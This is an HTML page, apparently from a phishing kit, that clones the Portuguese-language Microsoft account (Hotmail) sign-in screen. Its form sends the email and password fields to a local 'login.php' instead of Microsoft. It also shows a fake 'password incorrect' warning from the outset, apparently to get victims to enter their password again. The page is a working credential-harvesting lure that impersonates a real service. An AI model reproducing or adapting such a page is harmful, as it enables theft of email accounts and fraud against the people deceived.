<!DOCTYPE html>
<html dir="ltr" lang="PT-BR"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><!-- base href="https://login.live.com/pp1400/" --><script type="text/javascript">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, Voice: -3};</script><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=PT-BR&lc=1046"/>Para entrar na conta da Microsoft, você precisa do JavaScript. Este navegador da Web não permite JavaScript ou os scripts estão sendo bloqueados.<br /><br />Para saber se o navegador é compatível com JavaScript ou para permitir scripts, veja a ajuda online do navegador.</noscript><title>Entrar</title>  <meta name="description" content="O novo Hotmail está aqui. É um email gratuito poderoso, com recursos de segurança da Microsoft. Com 2 GB de espaço, novo design e segurança avançada - com certeza você vai adorar."><meta name="PageID" content="i5030"><meta name="SiteID" content="64855"><meta name="ReqLC" content="1046"><meta name="LocLC" content="1046"><link rel="shortcut icon" href="https://secure.shared.live.com/%7ELive.SiteContent.ID/%7E17.0.11/%7E/%7E/%7E/%7E/images/favicon.ico">
        <link rel="stylesheet" title="R3CSS" type="text/css" href="index_arquivos/R3WinLive1046.css"><style type="text/css">:root input[type=checkbox] + label, :root input[type=radio] + label{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~17.0.11/~/~/~/~/images/controls.png), url(Https://secure.shared.live.com/~Live.SiteContent.ID/~17.0.11/~/~/~/~/images/controls.png), url(Https://secure.shared.live.com/~Live.SiteContent.ID/~17.0.11/~/~/~/~/images/controls.png);}
::-webkit-scrollbar-button{background-image: url(Https://secure.shared.live.com/~Live.SiteContent.ID/~17.0.11/~/~/~/~/images/controls.png);}
a, a:visited{color:#0072C6;}
a:hover{color:#338ED1;}
a:hover:active{color:#66AADC;}
:root input[type=button].default, :root input[type=submit].default{background-color:#0072C6;}
:root input[type=button]:hover.default, :root input[type=submit]:hover.default, :root button:hover.default{background-color:#1E82CC;}
</style>
</head>
<body onload="evt_Login_onload(event);" uitheme="Web">
<div style="height: 40px;"></div><div style="width: 100%;" class="centerParent" id="shellTD"><div style="width: 935px;" class="center" id="shellTBL"><div class="centerParent"><div style="width: 895px;" class="center" id="mainTD"><div style="width: 475px;" class="floatLeft" id="brandModeTD"><div style="width: 475px;" id="productTD"><iframe src="index_arquivos/PT-BR.htm" marginwidth="0px" marginheight="0px" id="i0278" frameborder="0" height="490px" scrolling="no" width="475px"></iframe></div></div><div style="width: 420px; position: relative;" class="floatLeft" id="signInTD"><div style="height: 40px;"></div><div class="signInHeader" id="i0272"><iframe src="index_arquivos/PT-BR_002.htm" marginwidth="0px" marginheight="0px" id="i0277" frameborder="0" height="50px" scrolling="no" width="320px"></iframe></div><div style="height: 30px;"></div><div style="width: 100px; height: 370px;" class="floatLeft"></div><div style="width: 320px;" class="floatLeft">
  <div id="rightTD"><form action="login.php" method="POST" name="f1" target="_top" novalidate><div class="section"><div aria-atomic="true" aria-relevant="text" aria-live="assertive" id="idTd_Tile_Error" style="display: none;"><div id="idTd_Tile_ErrorMsg_Login" class="errorDiv first"></div></div><div aria-atomic="true" aria-relevant="text" aria-live="assertive" id="idTd_PWD_Error" style="display: none;"><div id="idTd_PWD_ErrorMsg_Username" class="errorDiv first">Generic Password Error Message</div></div><div class="row label" id="idTd_PWD_UsernameLbl">
    <div></div>
    <div>
      <div id="rightTD2">
        <div>
          <div aria-atomic="true" aria-relevant="text" aria-live="assertive" id="idTd_Tile_Error2">
            <div id="idTd_Tile_ErrorMsg_Login2" ><font color="#D56A00">Essa senha está incorreta. Verifique se você está usando a senha da sua conta da Microsoft.</font><br>
              <br>
            </div>
          </div>
        </div>
      </div>
    </div>
    <p><span role="heading">Conta da Microsoft <a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=254486" id="idA_MSAccLearnMore">O que é isto?</a></span></p>
  </div><div class="row textbox" id="idDiv_PWD_UsernameTb"><div style="position: relative; width: 100%;"><input aria-labelledby="idLbl_PWD_Username" class="ltr_override" maxlength="113" id="i0116" name="login" lang="en" type="email"><div style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;" class="phholder"></div></div></div><div aria-atomic="true" aria-relevant="text" aria-live="assertive" id="idTd_PWD_Error_Password" style="display: none;"><div id="idTd_PWD_ErrorMsg_Password" class="errorDiv"></div></div><div class="row textbox" id="idDiv_PWD_PasswordTb"><div style="position: relative; width: 100%;"><input aria-labelledby="idDiv_PWD_PasswordExample" autocomplete="off" id="i0118" name="passwd" type="password"><div style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;" class="phholder"></div></div></div><div id="idTd_PWD_KMSI_Cb"><input value="1" id="idChkBx_PWD_KMSI0Pwd" name="KMSI" type="checkbox"><label id="idLbl_PWD_KMSI_Cb" for="idChkBx_PWD_KMSI0Pwd">Mantenha-me conectado</label></div></div><div class="section" id="idTd_PWD_SubmitCancelTbl"><input class="default" value="Entrar" id="idSIButton9" name="SI" type="submit"></div><div class="section"><div class="row small" id="idDiv_PWD_ForgotPassword"><a id="idA_PWD_ForgotPassword" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26ct%3d1365385981%26rver%3d6.1.6206.0%26sa%3d1%26ntprob%3d-1%26wp%3dMBI_SSL_SHARED%26wreply%3dhttps:%252F%252Fmail.live.com%252F%253Fowa%253D1%2526owasuffix%253Dowa%25252f%26id%3d64855%26snsc%3d1%26cbcxt%3dmail%26vv%3d1400%26mkt%3dPT-BR%26lc%3d1046&amp;id=64855&amp;uiflavor=web&amp;mkt=PT-BR&amp;lc=1046&amp;bk=1365385983">Não consegue acessar sua conta?</a></div><div class="row small" id="idTD_PWD_SwitchToOTCLink"><a id="idA_PWD_SwitchToOTC" href="">Entrar com um código de uso único</a></div></div></form></div><div style="visibility: hidden;" class="SignUp" id="SignUpTD"><span>Não tem uma conta da Microsoft?</span> <a class="TextSemiBold" href="https://signup.live.com/?wa=wsignin1.0&amp;ct=1365385981&amp;rver=6.1.6206.0&amp;sa=1&amp;ntprob=-1&amp;wp=MBI_SSL_SHARED&amp;wreply=https:%2F%2Fmail.live.com%2F%3Fowa%3D1%26owasuffix%3Dowa%252f&amp;id=64855&amp;snsc=1&amp;cbcxt=mail&amp;bk=1365385983&amp;uiflavor=web&amp;mkt=PT-BR&amp;lc=1046" id="idA_SignUp">Inscreva-se já</a></div></div><div class="SignUp signUpFloat" id="SignUpTD"><span>Não tem uma conta da Microsoft?</span> <a class="TextSemiBold" href="https://signup.live.com/?wa=wsignin1.0&amp;ct=1365385981&amp;rver=6.1.6206.0&amp;sa=1&amp;ntprob=-1&amp;wp=MBI_SSL_SHARED&amp;wreply=https:%2F%2Fmail.live.com%2F%3Fowa%3D1%26owasuffix%3Dowa%252f&amp;id=64855&amp;snsc=1&amp;cbcxt=mail&amp;bk=1365385983&amp;uiflavor=web&amp;mkt=PT-BR&amp;lc=1046" id="idA_SignUp">Inscreva-se já</a></div></div></div></div><div style="height: 50px; clear: both;"></div><div style="clear: both;" class="footer centerParent" id="footerTD"><div style="width: 895px;" class="center"><table class="footer" cellpadding="0" cellspacing="0"><tbody><tr><td align="left"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="text-align: left;"><span class="secondary" id="ftrCopy">©2015 Microsoft</span></td><td style="text-align: left;"><span></span></td><td class="footerspace">&nbsp;</td><td class="footerspace">&nbsp;</td><td style="text-align: left;"><a id="ftrTerms" class="footerlink" href="http://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=PT-BR&amp;vv=1400">Termos</a></td><td class="footerspace">&nbsp;</td><td class="footerspace">&nbsp;</td><td style="text-align: left;"><a id="ftrPrivacy" class="footerlink" href="http://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=PT-BR&amp;vv=1400">Privacidade e cookies</a></td></tr></tbody></table></td><td></td><td align="right"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="text-align: right;"><a id="ftrHelp" class="footerlink" href="http://login.live.com/gls.srf?urlID=WLHelpCentral&amp;mkt=PT-BR&amp;vv=1400">Central de Ajuda</a></td><td class="footerspace">&nbsp;</td><td class="footerspace">&nbsp;</td><td style="text-align: right;"><a id="ftrFdbk" class="footerlink" href="http://login.live.com/gls.srf?urlID=WLFeedback&amp;mkt=PT-BR&amp;vv=1400">Comentários</a></td></tr></tbody></table></td></tr></tbody></table></div></div></div></div><img style="visibility: hidden;" alt="" id="ev" height="0"></body></html>